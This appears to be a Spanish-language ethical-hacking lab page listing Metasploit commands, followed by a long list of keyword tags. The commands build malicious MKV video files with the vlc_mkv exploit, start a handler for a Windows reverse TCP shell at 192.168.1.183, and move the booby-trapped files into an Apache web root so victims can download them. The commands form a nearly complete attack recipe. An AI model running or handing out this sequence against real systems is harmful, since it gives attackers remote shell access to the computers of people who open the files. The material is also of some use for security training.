
LABORATORIO de TRABAJO donde se realizaron las pruebas

LISTADO DE COMANDOS USADOS
Código: Seleccionar todo
msfconsole
search vlc
use exploit/windows/fileformat/vlc_mkv
options
set MKV_ONE video1
set MKV_TWO video2
set lhost 192.168.1.183
exploit
/root/.msf4/local/video1.mkv
/root/.msf4/local/video2.mkv
-------------------------------------------------------
use exploit/multi/handler
set payload windows/shell/reverse_tcp
o
set payload windows/x64/shell/reverse_tcp
show options
set lhost 192.168.1.183
exploit
mv /root/.msf4/local/video1.mkv /var/www/html
mv /root/.msf4/local/video2.mkv /var/www/html
-------------------------
Comandos de Apache servidor web
service apache2 status
service apache2 start
systemctl start apache2.service
systemctl status apache2
service apache2 status
Pentesting framework python perl synology xpenology ruby microsoft windows Security Technologies Ransomware Sistema operativo Operating Systems Scanner Servicio WEB Apache
scanner,oscp,ddos,learn security,unix,ubuntu,debian,OSINT,oscp certification,ceh,try hack me,hacking,ethical hacker,ctf for beginners,ehtical hacking,cyber seguridad,security,linux,tool,penetration tests,herramienta,linux for ethical hackers,BUG,capacitacion,educacion,How Hackers Do It,cyber security,bug,exploit,tutorial,proteger computadoras,Information Systems Security Professional,como usar kali linux,metasploit,VLC,VIDEO FILE,archivo de video,LAN,network